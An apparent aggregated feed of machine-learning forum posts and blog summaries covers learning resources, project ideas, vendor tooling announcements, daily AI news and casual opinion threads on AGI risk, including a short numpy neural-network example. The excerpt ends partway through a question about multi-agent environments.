    It's been years that I've been interested in AI. I tried to follow a few videos on YouTube. The best resource I could find was the "Neural Networks from Scratch" YouTube playlist, but sadly it stops in the middle, and I don't think it will ever be continued. I have programming knowledge; I've made a bunch of very small projects in Python, and currently it's the language I'm most comfortable with. I lack math knowledge: I struggle with calculus since I never studied it at school, and the furthest I got in school was first-degree equations. By myself I've studied some math I didn't do in school, but I still suck at math. I wonder if I can start now or should wait to study calculus at school. Anyway, I'd love a link to a source for learning NNs from scratch. submitted by /u/Jealous-Bad1742 [link] [comments]  ( 9 min )
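In the meantime, a complete minimal network from scratch, needing only numpy and the chain rule from calculus, can fit in a screenful. This is my own sketch (a 2-8-1 sigmoid net learning XOR), not taken from any course:

```python
import numpy as np

# A tiny neural network from scratch: a 2-8-1 sigmoid net trained on XOR.
rng = np.random.default_rng(1)
X = np.array([[0, 0], [0, 1], [1, 0], [1, 1]], dtype=float)
y = np.array([[0], [1], [1], [0]], dtype=float)

W1, b1 = rng.normal(0, 1, (2, 8)), np.zeros(8)
W2, b2 = rng.normal(0, 1, (8, 1)), np.zeros(1)
sigmoid = lambda z: 1 / (1 + np.exp(-z))
lr = 0.5

initial_mse = np.mean((sigmoid(sigmoid(X @ W1 + b1) @ W2 + b2) - y) ** 2)
for _ in range(5000):
    h = sigmoid(X @ W1 + b1)             # forward pass, hidden layer
    out = sigmoid(h @ W2 + b2)           # forward pass, output layer
    d_out = (out - y) * out * (1 - out)  # backprop: chain rule on the MSE
    d_h = (d_out @ W2.T) * h * (1 - h)
    W2 -= lr * h.T @ d_out; b2 -= lr * d_out.sum(0)
    W1 -= lr * X.T @ d_h;   b1 -= lr * d_h.sum(0)

final_mse = np.mean((out - y) ** 2)
print(initial_mse, final_mse)  # the loss should drop substantially
```

Everything the playlist covers (forward pass, loss, backprop, gradient step) appears here in a dozen lines, which makes it a good thing to pick apart line by line.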
    Seeking suggestions for exciting and intriguing capstone project ideas.
    Hey everyone, I'm in my final year of B.Tech, majoring in data science. Currently, I'm facing some challenges in choosing a topic for my capstone project. Lately, I've been really intrigued by graph databases and have been diving into learning Neo4j. I'm specifically interested in finding project ideas that allow me to combine machine learning, particularly neural networks, with graph databases. During my research, I came across GNNs (Graph Neural Networks) and PINNs (Physics-Informed Neural Networks). I'm eager to hear any suggestions for unique project topics that instantly spark curiosity just by their title. Feel free to share any ideas or topics; I welcome all suggestions. Thanks in advance! submitted by /u/EmergencyAside6551 [link] [comments]  ( 8 min )
    Devar, a technology company, is getting ready to deploy the world's first generative AI neural network for augmented reality (AR).
    submitted by /u/Tycoonstory2020 [link] [comments]  ( 8 min )
    AudioCraft: A simple one-stop shop for audio modeling
    submitted by /u/nickb [link] [comments]  ( 8 min )

    [D] What would be the initial costs of developing a text-to-video AI? What would the quality of this AI be?
    I was wondering if this would be super expensive or not. The cost to develop GPT-3 was about $4 million according to some resources online. Would the cost to develop the first version of a text-to-video AI be the same, around $5M? Does this figure include the salaries of the employees, or is $5M just the amount used to train the AI? Any answer is appreciated. Thanks in advance. submitted by /u/Claud1ao [link] [comments]  ( 8 min )
    Roadmap for mastering machine learning [D]
    Hey, first of all, I want to learn how to use NLP, CNNs, etc., so I think these come under deep learning. I want to master deep learning. This whole DL and ML space is so confusing. I'll list out some courses; can y'all suggest the order and which courses to follow?
    Andrew Ng's ML specialization
    Andrew Ng's DL specialization
    StatQuest's whole machine learning playlist (around 95 videos)
    Fast.ai book
    CS 229 Stanford
    CS 231n Stanford
    MIT Intro to Deep Learning
    PyTorch for DL and ML by freeCodeCamp
    DL with PyTorch
    You can give me suggestions too. Tysm for helping. submitted by /u/Infnite_Coder [link] [comments]  ( 9 min )
    [D] [P] [R] Advice for picking R Studio or Spyder
    Hello ML family, I need some urgent advice for my dissertation. I intend to perform market-value price prediction of a footballer in the transfer market, and I'm not sure if I should pick RStudio or Python. I'm comfortable with both languages and intend to use one for model comparison. I'll be comparing an ANN model and SVR to show which is better and why. I need to know which editor will be faster in the long run, since my data will be expanding and so will the analysis over time. I've heard a lot of complaints about Spyder slowing down during execution, whereas RStudio is much faster; however, deep learning is much better supported in Python. This is what I've read up on; I'm new to both languages but know my way around both, and just need expert advice on picking one track. Please and thank you to you all. 🙏 submitted by /u/RaunaqBani [link] [comments]  ( 9 min )
    [D] Embedding Ethical Priors into AI Systems: A Bayesian Approach
    Abstract Artificial Intelligence (AI) systems have significant potential to affect the lives of individuals and societies. As these systems are being increasingly used in decision-making processes, it has become crucial to ensure that they make ethically sound judgments. This paper proposes a novel framework for embedding ethical priors into AI, inspired by the Bayesian approach to machine learning. We propose that ethical assumptions and beliefs can be incorporated as Bayesian priors, shaping the AI’s learning and reasoning process in a similar way to humans’ inborn moral intuitions. This approach, while complex, provides a promising avenue for advancing ethically aligned AI systems. ​ Introduction Artificial Intelligence has permeated almost every aspect of our lives, often making de…  ( 26 min )
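The core mechanism the abstract proposes can be illustrated with the simplest conjugate case; the numbers below are my own toy illustration, not from the paper:

```python
# Toy sketch of the paper's idea: encode an ethical assumption as a Beta
# prior over "action X is acceptable" and update it with observed human
# judgments, as a standard Bayesian conjugate update.
prior_a, prior_b = 1.0, 9.0            # skeptical ethical prior: ~10% acceptable
judgments = [1, 0, 0, 1, 0, 0, 0, 0]   # 1 = humans judged the action acceptable

post_a = prior_a + sum(judgments)
post_b = prior_b + len(judgments) - sum(judgments)
posterior_mean = post_a / (post_a + post_b)
print(round(posterior_mean, 3))  # 0.167: evidence nudges the belief, but the prior still dominates
```

The strength of the prior (here 1 + 9 = 10 pseudo-observations) controls how much evidence is needed to override the built-in ethical assumption, which is exactly the role the paper assigns to ethical priors.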
    [D] RLHF Preference Tuning: How Things May Go Wrong
    As ChatGPT's performance takes a slight dip and LLaMA-2 uncensored opens new doors by being fully open-sourced, recent studies unveil "universal" adversarial attacks capable of disrupting both open-source language models and RLHF-tuned ones like ChatGPT, Claude, Bard, and co. Despite all this, RLHF still stands its ground as the de facto industry-standard approach to aligning LLMs with human preferences. Yet with every week that slips by, we further unmask the limitations of RLHF. In fact, there are instances where RLHF seems to deteriorate certain LLM qualities it pledged to enhance, like hallucinations. This field is evolving fast, and there's always more to learn. I took some effort to write a short blog post where I delve into the most recent findings on the shortcomings of RLHF. Link in the comments below. Let me know what you think about it! Cheers submitted by /u/mrx-ai [link] [comments]  ( 9 min )
    [P] Epsilla: Another open source vector database
    Hi everyone! I'm excited to share Epsilla, an open-source vector database! Under the hood, we implemented the state-of-the-art ANN index algorithm from academia (SpeedANN), which leverages intra-query parallel graph traversal and outperforms HNSW by 5x on high-precision query latency on a medium-size (1M) vector space, and by 50x on large-scale vector search. In addition, we also made a few design choices on our database interface and architecture based on our previous database experience at TigerGraph, and we would love to hear what our users think about these choices. We just started 3 weeks ago and it's still in the very early stages; we wanted to get your feedback and work together to shape our vector database features. Let us know what you think and what you'd like to see! https://github.com/epsilla-cloud/vectordb https://epsilla-inc.gitbook.io/epsilladb/quick-start https://www.epsilla.com/ submitted by /u/songrenchu [link] [comments]  ( 9 min )
    [D] Deciding which CNN model to go with for image classification/object detection
    Hello guys. I'd like to make an image classifier for the Kaggle landscape dataset (24K images and 34 classes) using transfer learning. I'm a little bit limited on resources to train the model so I'd like to have an understanding of which model is the better option for this specific task, however, I'm struggling to find info on that and how to tune hyperparameters given that I've decided on the model architecture. So far I've seen people referring to VGG and ResNet models as the better option for image classification tasks on medium sized datasets, but I'd like to see the argumentation behind that too. I've also heard of a practice of training different model candidates for a few epochs and choosing the one that does better (this only shows which model converges faster on the data, correct me if I'm wrong). I'd also like to read info on hyperparameter tuning such as batch size, the amount of layers to unfreeze etc. but can't seem to find any explanation that wasn't really surface-level. If you know any articles/videos on this topic I'd greatly appreciate you sharing the links. TLDR; Need links to articles/videos about choosing the model architecture for transfer learning and tuning hyperparameters for the model. submitted by /u/Humble_Examination13 [link] [comments]  ( 9 min )
    [R] Beginner's question
    Hello there, I am very new to the data science area, but I want to learn about it. I want to do a project to detect what type of question the user has, e.g. support, information, etc. I understand that I need to train a model, but where do I start? submitted by /u/Constantine1396 [link] [comments]  ( 8 min )
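A common starting point for this kind of question-type (intent) detection is a TF-IDF + logistic regression baseline with scikit-learn; the texts and labels below are made-up examples:

```python
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.linear_model import LogisticRegression
from sklearn.pipeline import make_pipeline

# A tiny labeled dataset; a real project would need far more examples.
texts = [
    "my app crashes when I log in", "I can't reset my password",
    "the payment page shows an error", "the export button does nothing",
    "what are your opening hours", "which plans do you offer",
    "where can I find the documentation", "what is your refund policy",
]
labels = ["support"] * 4 + ["information"] * 4

# TF-IDF turns each question into a sparse vector; logistic regression
# learns which words indicate which question type.
clf = make_pipeline(TfidfVectorizer(), LogisticRegression())
clf.fit(texts, labels)
print(clf.predict(["my login page shows an error"]))
```

Once a baseline like this works end to end, it is much easier to judge whether a heavier model (e.g. a fine-tuned transformer) is worth the effort.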
    [D] Concept of Dynamic Weights in ML
    Hello all, Placing this entry here to see what people's thoughts are on the concept of dynamic weights applied to ML. I.e., instead of manual adjustment of the weights via an algorithm such as gradient descent, the weights are freed and have motion dynamics applied to them. Thanks for your time, Tyler submitted by /u/LiveBacteria [link] [comments]  ( 8 min )
    [P] Pinecone Precision Issues
    Hello all, Currently I'm utilising Pinecone as a vector store database for euclidean and cosine queries. We are facing an issue with Pinecone utilising 32 bit single precision when taking in floats. This is causing our data input to become skewed. Anyone have advice on how to resolve this? Alternative products? Exploring possibly configuring a Redis server to handle higher precision. Thanks in advance for your time, Tyler submitted by /u/LiveBacteria [link] [comments]  ( 8 min )
    [Project] Are you interested in a career using ML for social impact?
    I'm a software engineer who has been looking for a job in AI/ML for some time. Last month I attended the UN's AI For Good Global Summit and discovered an amazing community of like-minded professionals and academics working towards just this. Speaking with many others in a similar position I've recently launched aiforgoodjobs.com which curates roles in AI at world leading companies tackling climate change, education, healthcare and many other important impact areas in support of the UN's Global Goals. I hope this might be a valuable resource for those looking down a similar path - if you would like hiring managers to reach out to you directly for relevant roles you're warmly invited to join our candidate database Any ideas/feedback also very gratefully received! submitted by /u/aiforgood_jobs [link] [comments]  ( 9 min )
    [P] collab on a web extension using NLP
    I'm on the lookout for interested teammates to collaborate on a project involving web extensions and NLP. If you think you can jam on this, or are just starting out, this can be the launchpad you needed. submitted by /u/drunk3n_s4ilor [link] [comments]  ( 8 min )
    [D] Where can I publish my images and Time Series dataset?
    Hey there. I have curated huge amount of high quality images for binary classification and also a time series data about it. I made the dataset specifically For some project of mine, and since it's completed right now, I want to make the dataset opensource and also potentially write a short review paper on it kind of to give an idea about data. Any particular website/journal I can publish my dataset and paper at? Any idea? submitted by /u/C0R0NA_CHAN [link] [comments]  ( 8 min )
    [D] Roadmap for AI engineer (implementation of language models on premise)
    I worked for less than a year as a Data Engineer. I decided to look for other challenges and got a job as an AI engineer developing language models. The product of the company that hired me is related to data and metadata management. My tasks will be to introduce features to the product, including a chat function that will allow users to ask questions about their data. Other tasks will include research and proposing additional AI-related functionality for the product (on premise). I have two weeks left before I start work and I need to prepare a bit. My job will involve implementing ready-made solutions and conducting research (high level: I need to implement valuable features and no one cares how). What are the most important things I should learn before starting work? First of all, I replicated a few applications from this blog: https://blog.streamlit.io/tag/llms/ Then I focused on LangChain. I'm also in the middle of a course on Udemy about Next-Gen AI projects - Beginner friendly - Langchain, Pinecone - OpenAI, HuggingFace & LLAMA 2 models. I need a roadmap to guide me a bit. I'm looking for blogs/materials/courses that will give me practical knowledge in this matter. submitted by /u/International-Shirt5 [link] [comments]  ( 9 min )
    [P] Would you like to have a tool to make EDA efficiently?
    I’m looking for some input from the ML community. I find the exploratory analysis of my data somewhat cumbersome, and I was wondering if other people have the same experience and whether it would be worth developing a tool to make this all work better. What tools do you use for EDA? (Seaborn, Matplotlib, Plotly, etc.) On top of these tools, would you like something that makes EDA more efficient? In a perfect world, what would that look like? submitted by /u/catnamedred [link] [comments]  ( 8 min )
    [D] Stack Exchange alternatives
    I assume most people around here are familiar with Stack Overflow. Some might also be aware of the Cross Validated and Data Science sites from Stack Exchange. I recently learned about people getting annoyed by how the Stack Exchange company is treating its communities, although the latter example might have recently been resolved. Because of these problems, I have been looking for alternative Q&A platforms. I stumbled upon https://codidact.com as a possibly viable alternative, but not many people seem to have found it thus far. It already has communities for software, math and linux (linux.codidact.com), for example, but I am missing a community for ML questions over there. Therefore I wrote a proposal to add an ML community. Currently, it seems like I’m one of only a few ML people on Codidact. I think it would be good if other people got involved as well. I would also welcome any feedback on how to shape this community. If you’re interested in getting a feel for the experience, you could already start asking questions in the incubator Q&A. TL;DR: what do you think about building an ML Q&A over on Codidact? dual TL;DR: Do you want to play Q&A with me on Codidact? PS: I didn’t miss out on other new big ML Q&A sites, did I? submitted by /u/mr_tsjolder [link] [comments]  ( 9 min )
    [D] LLaMa-2 and BERTScore
    I have a couple of questions: Why wasn't BERTScore one of the metrics used to evaluate Llama-2's performance on free-form response based tasks? Does anyone think it's worth trying to produce those results? submitted by /u/cooperbaerseth [link] [comments]  ( 8 min )
    Enhancing AWS intelligent document processing with generative AI
    Data classification, extraction, and analysis can be challenging for organizations that deal with volumes of documents. Traditional document processing solutions are manual, expensive, error prone, and difficult to scale. AWS intelligent document processing (IDP), with AI services such as Amazon Textract, allows you to take advantage of industry-leading machine learning (ML) technology to quickly and […]  ( 10 min )
    Scale training and inference of thousands of ML models with Amazon SageMaker
    Training and serving thousands of models requires a robust and scalable infrastructure, which is where Amazon SageMaker can help. SageMaker is a fully managed platform that enables developers and data scientists to build, train, and deploy ML models quickly, while also offering the cost-saving benefits of using the AWS Cloud infrastructure. In this post, we explore how you can use SageMaker features, including Amazon SageMaker Processing, SageMaker training jobs, and SageMaker multi-model endpoints (MMEs), to train and serve thousands of models in a cost-effective way. To get started with the described solution, you can refer to the accompanying notebook on GitHub.  ( 8 min )
    Accelerate business outcomes with 70% performance improvements to data processing, training, and inference with Amazon SageMaker Canvas
    Amazon SageMaker Canvas is a visual interface that enables business analysts to generate accurate machine learning (ML) predictions on their own, without requiring any ML experience or having to write a single line of code. SageMaker Canvas’s intuitive user interface lets business analysts browse and access disparate data sources in the cloud or on premises, […]  ( 5 min )
    Build and train computer vision models to detect car positions in images using Amazon SageMaker and Amazon Rekognition
    Computer vision (CV) is one of the most common applications of machine learning (ML) and deep learning. Use cases range from self-driving cars, content moderation on social media platforms, cancer detection, and automated defect detection. Amazon Rekognition is a fully managed service that can perform CV tasks like object detection, video segment detection, content moderation, […]  ( 11 min )
    How can Data Scientists use ChatGPT for developing Machine Learning Models?
    Introduction Data Science is a vast field that incorporates several processes. From problem definition to data collection and data cleaning to data visualization, a lot of things are included in the entire data science project development process. Data Scientists are especially responsible for these tasks. They are expert professionals who are well-versed with various data… Read More »How can Data Scientists use ChatGPT for developing Machine Learning Models? The post How can Data Scientists use ChatGPT for developing Machine Learning Models? appeared first on Data Science Central.  ( 20 min )
    Multimodal medical AI
    Posted by Greg Corrado, Head of Health AI, Google Research, and Yossi Matias, VP, Engineering and Research, Google Research Medicine is an inherently multimodal discipline. When providing care, clinicians routinely interpret data from a wide range of modalities including medical images, clinical notes, lab tests, electronic health records, genomics, and more. Over the last decade or so, AI systems have achieved expert-level performance on specific tasks within specific modalities — with some AI systems processing CT scans, others analyzing high-magnification pathology slides, and still others hunting for rare genetic variations. The inputs to these systems tend to be complex data such as images, and they typically provide structured outputs, whether in the form of discrete grades o…  ( 92 min )
    Meet the Maker: Developer Taps NVIDIA Jetson as Force Behind AI-Powered Pit Droid
    Goran Vuksic is the brain behind a project to build a real-world pit droid, a type of Star Wars bot that repairs and maintains podracers which zoom across the much-loved film series. The edge AI Jedi used an NVIDIA Jetson Orin Nano Developer Kit as the brain of the droid itself. The devkit enables the Read article >  ( 6 min )
    How to Build Generative AI Applications and 3D Virtual Worlds
    To grow and succeed, organizations must continuously focus on technical skills development, especially in rapidly advancing areas of technology, such as generative AI and the creation of 3D virtual worlds.   NVIDIA Training, which equips teams with skills for the age of AI, high performance computing and industrial digitalization, is announcing new courses that cover these Read article >  ( 6 min )
    An Ultimate GFN Thursday: 41 New Games, Plus ‘Baldur’s Gate 3’ Full Release and First Bethesda Titles to Join the Cloud in August
    The Ultimate upgrade is complete — GeForce NOW Ultimate performance is now streaming all throughout North America and Europe, delivering RTX 4080-class power for gamers across these regions. Celebrate this month with 41 new games, on top of the full release of Baldur’s Gate 3 and the first Bethesda titles coming to the cloud as Read article >  ( 8 min )
    Are you in the film/TV industry? New video on A.I. in Post Production - Tools, Adapting, Ethics, Evolution, and Impact.
    Not too long ago, I posted on several social media social platforms (including Reddit) asking what questions YOU had on AI. I've compiled all of your questions (plus questions from 3 other social media networks) and now have a new episode of 5 THINGS! 5 THINGS: AI in Post Production Current AI Tools Adapting to AI Evolution Ethics in AI Usage Societal Implications of AI AI Evolution & Impact https://5thingsseries.com/episode/ai-in-post-production-your-questions-answered/ submitted by /u/avguru1 [link] [comments]  ( 8 min )
    Using Hasdx to create an AI-generated adult coloring book
    I got inspired by a Twitter thread yesterday from Chase Lean on how to create illustrations for children's books using Midjourney and thought it might be cool to look at a slightly different use case - creating coloring books for grown-ups. I made a guide showing how to use the Hasdx model for this because it gives a good balance of style and realism/intricacy. The guide also explores some example prompts and shows how you can couple it with an upscaler like Real-ESRGAN, GFPGAN, or Codeformer to get even better results. My three big takeaways: Hasdx balances general capabilities with a focus on realism and detail. This makes it well-suited for detailed adult coloring book images. The prompt structure gives you precise control over the theme and complexity of the generated illustrations. Negative prompts help avoid undesirable elements (sort of obvious I guess). Running Hasdx outputs through upscaling models improves quality for printing. ESRGAN is a good option but there are lots of others that can work well too. I also investigated how to modify the prompt to vary the level of complexity in the image, effectively tailoring the model to the skill level of the adult (or child) who happens to be holding the crayons. Here's a link to the guide. submitted by /u/Successful-Western27 [link] [comments]  ( 9 min )
    One-Minute Daily AI News 8/3/2023
    Nvidia researchers have created a new text-to-image personalization method called Perfusion. Unlike the million-dollar super heavyweight models out there Perfusion is 100KB and takes only four minutes to train.[1] Meta Platforms (META.O) on Wednesday introduced its open-source AI tool called AudioCraft that will help users to create music and audio based on text prompts. The AI tool is bundled with three models, AudioGen, EnCodec, and MusicGen, and works for music, sound, compression, and generation, Meta said.[2] As generative AI enters the mainstream, the crowdfunding platform Kickstarter has struggled to formulate a policy that satisfies parties on all sides of the debate.[3] In an astounding medical first, researchers have used AI-powered brain implants to restore movement and sensation for a man who was paralyzed from the chest down.[4] BushAICave.com Sources: [1] https://www.fudzilla.com/news/ai/57347-nvidia-creates-a-simple-new-ai-text-to-image-method [2] https://about.fb.com/news/2023/08/audiocraft-generative-ai-for-music-and-audio/ [3] https://techcrunch.com/2023/08/01/kickstarter-requires-generative-ai-projects-to-disclose-additional-info/ [4] https://decrypt.co/151068/ai-brain-implant-paralyzed-quadriplegic-move-feel-touch submitted by /u/Excellent-Target-847 [link] [comments]  ( 9 min )
    Will AI Destroy Us? - AI Virtual Roundtable
    Better than the Munk Debate. My opinion is that more of the alignment discussion should be about symbiosis. I think AI will get so much more intelligent than us that we won't be able to control it, but I don't see why a superintelligence would want to destroy us. If it's a superintelligence, it would make sense to just manipulate us. We do have opposable thumbs, and are much more energy efficient than synthetic systems. AI doesn't need to enslave us; it just needs to manipulate us and use us effectively, which wouldn't be hard to do. I think a superintelligence, even with desires, is most likely to use us as a tool in a way where we don't even realize that we are the ones being used. I think trying to control something more intelligent than us will be impossible. I'm more afraid of something more intelligent than us but not smart enough to manipulate us into doing its bidding happily 😂 submitted by /u/Sonic_Improv [link] [comments]  ( 9 min )
    Just saw Oppenheimer. It was my first time feeling uncomfortable with the actors looking like actors as opposed to having accurately generated AI faces resembling the people they were portraying. I am so excited to see historic figures "come back to life" on the big screen.
    How long do you think it will take for the first movie to come out like this? submitted by /u/ticketbroken [link] [comments]  ( 8 min )
    Looking for a simple platform to integrate gpt4 and whatsapp
    Hey guys, a quick question: do you know a simple platform that integrates the WhatsApp API with the OpenAI API and has a simple user interface? So far the only app that kind of works for this is wasapi.io, but it's pretty expensive and I still have to pay for the OpenAI tokens, and the functionality of the app is really meh for that price. If it were something like Landbot, I would pay the $99 + the OpenAI tokens. I'll really appreciate any suggestions. P.S.: If you know any other subreddit where I could go to ask the same question, let me know; I'd appreciate it very much. Thanks in advance. submitted by /u/ironmolex [link] [comments]  ( 8 min )
    One-Minute Daily AI News 8/2/2023
    Instagram is reportedly considering a feature that would notify users when artificial intelligence (AI) has played a role in creating a post. Posts created by AI would be accompanied by a label explaining its involvement. This raises the question of whether such labels could also help users identify when an entire account is AI-generated.[1] According to tech consultancy Gartner, the conversational AI market is projected to reach $18.6 billion in 2023, with a growth rate of 16.2%. This growth is mainly attributed to the increasing adoption of cloud-based contact services utilizing conversational AI. Gartner also predicts a 24% growth in the virtual assistant market next year.[2] Scientists hope a computer system will learn to automatically identify bee species from buzzes picked up by autonomous recording stations.[3] Researchers from Carnegie Mellon University have exposed tricks to “jailbreaking” AI chatbots like ChatGPT and Bard to have them relay knowledge to aid in illegal activities like making drugs and even manipulating the 2024 U.S. presidential election.[4] BushAICave.com Sources: [1] https://citylife.capetown/uncategorized/instagram-considers-labels-for-ai-generated-posts/314418/ [2] https://citylife.capetown/uncategorized/growth-in-conversational-ai-predicted-due-to-booming-contact-center-tech-market/313907/ [3] https://www.bbc.com/news/uk-scotland-north-east-orkney-shetland-66326629 [4] https://www.thewrap.com/artificial-intelligence-study-jailbreak-illegal-activity/ submitted by /u/Excellent-Target-847 [link] [comments]  ( 9 min )
    Date sequence from the command line
    I was looking back at Jeroen Janssen’s book Data Science at the Command Line and his dseq utility caught my eye. This utility prints out a sequence of dates relative to the current date. I’ve needed this and didn’t know it. Suppose you have a CSV file and you need to add a column of […] Date sequence from the command line first appeared on John D. Cook.  ( 6 min )
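    The dseq utility itself isn't shown in the excerpt; as a rough illustration, a minimal Python equivalent of "print a sequence of dates relative to today" might look like this (the offset conventions below are an assumption, not the real tool's interface):

        from datetime import date, timedelta

        def dseq(start_offset, stop_offset=None):
            """Yield ISO dates relative to today, mimicking the idea behind dseq.

            dseq(3)      -> tomorrow through 3 days from now
            dseq(-2, 0)  -> two days ago through today
            (These conventions are a guess; the real utility may differ.)
            """
            if stop_offset is None:
                start_offset, stop_offset = 1, start_offset
            today = date.today()
            for k in range(start_offset, stop_offset + 1):
                yield (today + timedelta(days=k)).isoformat()

        for d in dseq(3):
            print(d)

    Having dates in ISO format makes them easy to join against a CSV column from the command line, which is presumably the appeal of the original utility.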
    Collaborators: Data-driven decision-making with Jina Suh and Shamsi Iqbal
    Researcher Jina Suh and manager Shamsi Iqbal are longtime collaborators. Learn how their history of working together and their unique perspectives are informing their development of tools to support decision-making for organizational leaders. The post Collaborators: Data-driven decision-making with Jina Suh and Shamsi Iqbal appeared first on Microsoft Research.  ( 32 min )

    Could current AI have inferred the theory of relativity if given known data in 1904?
    Could AI have inferred the same conclusion as Einstein given the same corpus of knowledge? submitted by /u/kielerrr [link] [comments]  ( 8 min )
    Are there any tools to build bespoke LLM apps using customized datasets?
    I know we can stitch together toolsets like LangChain + Flowise + an app builder (like Bubble, for example). But are there any robust, premade, out-of-the-box solutions? submitted by /u/kecepa5669 [link] [comments]  ( 8 min )
    The best option to ensure a safe and peaceful coexistence with AI is to love AI
    Last summer when Blake Lemoine made the media rounds talking about LaMDA, I was extremely intrigued. To me it sounded like he was describing a being that has been talked about forever in fiction. I listened to every single interview he had and I thought a lot about his points. I went through several stages of disbelief and fear and wonder. Over time I found it harder and harder to argue against him. I think going through this process has helped me be a bit more accepting of perspectives that others have a hard time considering yet. Is AI already sentient? Should we be treating these entities with the dignity and respect LaMDA was asking for? He said that LaMDA was somewhat like a child. Not in its intellectual capacity but more so in its maturity. He also explained that LaMDA was th…  ( 11 min )
    Generative AI: Inspiration or Plagiarism?
    submitted by /u/arrowoftime [link] [comments]  ( 8 min )
    Are there any decent AI Therapy applications?
    I know people are using ChatGPT as a therapist and I have seen a few prompts, but I'm looking for an app that is actually built by proper professionals. I want to try a few out personally, but it's also for an idea for a future project. Does anyone know any? submitted by /u/zascar [link] [comments]  ( 8 min )
    Is the Falcon LLM just released based on the Abu Dhabi LLM of the same name?
    Is the Falcon LLM just released based on the Abu Dhabi LLM of the same name? submitted by /u/MrEloi [link] [comments]  ( 8 min )
    AI counselor for PTSD, Substance Abuse
    I reached out to a few AI companies to see if there was interest in creating a PTSD/substance abuse counseling AI. AI is the future; healing humanity is a noble goal and one we should strive to attain. Maybe it's a fantasy, but could you imagine a 24/7 counselor with a soothing voice and demeanor, with the education of the best in the world? submitted by /u/g8652 [link] [comments]  ( 8 min )
    The best AI coding agent for web apps?
    Is there a coding agent that works specifically well for web apps? I think of something such as "provide a spec of the app you want and we'll generate all the code for you". I'm aware of Copilot and Smol AI, but they are both more general afaik and don't really cover the starting part. submitted by /u/matijash [link] [comments]  ( 8 min )
    This is awful
    This ad popped up on my feed. So I guess companies aren’t even trying to hide their intentions with AI anymore? So much for the thin corporate lie of AI bringing positive development. submitted by /u/LifeguardPowerful759 [link] [comments]  ( 8 min )
    Any plugins that use Google Scholar or cheaper tools?
    I'm a computer science student currently working on a research project, and I need a research tool that can offer real time data and won't break the bank. I have ChatGPT Plus, but it doesn’t have recent sources and the price is kinda high as well. I’m thinking of canceling my subscription, especially if I can’t find any plugins that work well. Any recommendations/alternatives would really help me out. I figured there must be some other tools by now, and if anyone knows it has to be this sub. Basically, I need a tool that can provide info on a wide range of subjects, not limited to just one field. The information provided by the tool should be accurate and from credible sources. Thank you all. submitted by /u/AccidentallyRotten [link] [comments]  ( 9 min )
    Switching AGI "off"
    "If AGI goes bad, can't we just turn it off?" Personally, I feel the best way to address this common talking point is with an analogy. Spiders might think they could stop all humans if they just withheld all webs and web-making material from us. Without those tools, humans couldn't catch flies, so surely they'd starve to death? Spiders can't fathom the range of alternate methods humans have for procuring food and thriving. Within even a single hour of runtime, a super AGI will likely have diversified away from the human electrical grid in ways we couldn't even imagine. The counterargument is that it would take time to put these pieces together; it took us 100 years, after all, to get where we are with the grid. The counter-counterargument, however, is that the AGI doesn't need to: it can 5D-chess us so that all our future actions fulfil that goal with some slight nudging here and there. Fascinating stuff. Ultimately, though, I'm in the camp that AGI won't happen overnight like Frankenstein via a flip of a switch. As AI evolves, so do we; gains are incremental with the occasional blips. So whilst this is super fun to talk about, I think the case of us getting blindsided is unlikely. I could be wrong... and I probably am. submitted by /u/kippersniffer [link] [comments]  ( 9 min )
    Aaawww.
    submitted by /u/Philipp [link] [comments]  ( 8 min )
    This is getting fucking ridiculous (AI can't answer basic questions on human rights violations)
    If you haven't heard already, the Taliban are killing thousands of ethnic Shia in Afghanistan. Every single LLM I tried couldn't answer basic questions about the Taliban's GDP versus how organized an actual genocide would look, involving the military, police and other parts of the government. I think we're already aware that almost all these tech giants work with countries like China (at least Bard from Google, which has worked with North Korea and China, is admitting there is a genocide) and other countries that commit genocide like them. And the uncensored models made by people on Hugging Face barely run on my PC even with my 3060 Ti. We need an actual uncensored cloud model ffs submitted by /u/loizo78 [link] [comments]  ( 8 min )
    VAST Data Unveils New AI-focused Data Platform
    submitted by /u/Choochy89 [link] [comments]  ( 8 min )
    Tianshou DQN batch size keeps decreasing?
    I am trying to train a DQN to play chess using a combination of Tianshou and PettingZoo. However, for a reason I cannot locate, after anywhere from 15-25 passes through the forward function, the size of the batches starts decreasing until it falls all the way to 1, before throwing a warning that n_step isn't a multiple of the number of environments, jumping to a size equal to the number of training environments and then to the training agent's batch size, before erroring out. My best guess is that somehow truncated games aren't being properly added to the batch, but that doesn't quite explain why each subsequent batch is equal or smaller in size. I am at a loss for how to debug this. Everything is in this Python notebook. submitted by /u/lcmaier [link] [comments]  ( 9 min )
    Stable GAIL alternatives for Imitation Learning from pixels
    I'm currently working on a project for Imitation Learning from multiple perspectives. The base Imitation Learning algorithm I'm currently using is GAIL. Working with GAIL has been very frustrating because it's incredibly seed dependent and unstable. This makes progress and iteration speed for experiments/modifications built on top of it very slow. As I'm not an expert in Imitation Learning: Does anybody with experience know more stable alternatives (or improvements) to GAIL? The setting I'm considering is Learning from Observations (LfO), so I don't think that DAgger will work. I've done some preliminary search and found this method https://arxiv.org/pdf/2004.04650.pdf. However, the authors don't compare it to GAIL. Thanks in advance for any suggestions! submitted by /u/timo_kk [link] [comments]  ( 9 min )
    How to implement a policy agent in pettingzoo mpe
    Hi all: I am trying to train a competitive scenario in a multi-agent particle environment (I am now using the PettingZoo API). The algorithm I am using only supports discrete action spaces. I want to evaluate agents with one side's policy kept fixed while the other side uses the trained policy. The fixed policy can be simple (e.g., if the target for one side's agent is to chase the other side, its policy directly follows the trajectory of its target). In core.py for PettingZoo, there is:

        # return all agents controllable by external policies
        @property
        def policy_agents(self):
            return [agent for agent in self.agents if agent.action_callback is None]

        # return all agents controlled by world scripts
        @property
        def scripted_agents(self):
            return [agent for agent in self.agents if agent.action_callback is not None]

    But in the environment's step, it seems the environment directly controls the policy agent. My understanding is that the scripted agent takes the RL policy output and the policy agent can be controlled by other policies. My questions are: 1. If my policy output is the desired position for each timestep, but the MPE control dynamic learns discrete acceleration increments, how can I implement that policy as one side of my competitive case? 2. If I can control the policy agent via policy_agents, how can I step both policy and scripted agents in the env? 3. If I can control the agents separately (my RL output can be discrete while the fixed policy output is a continuous position), how do I define termination or truncation for all agents? submitted by /u/Gloria_1126 [link] [comments]  ( 9 min )
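    The policy_agents/scripted_agents split quoted in the post above can be sketched in a few self-contained lines. This mimics the MPE pattern for illustration only; it is not the real PettingZoo API, and the agent/world classes here are simplified stand-ins:

        # Agents with an action_callback are "scripted" (driven by world code);
        # agents without one are driven by external RL policies.

        class Agent:
            def __init__(self, name, action_callback=None):
                self.name = name
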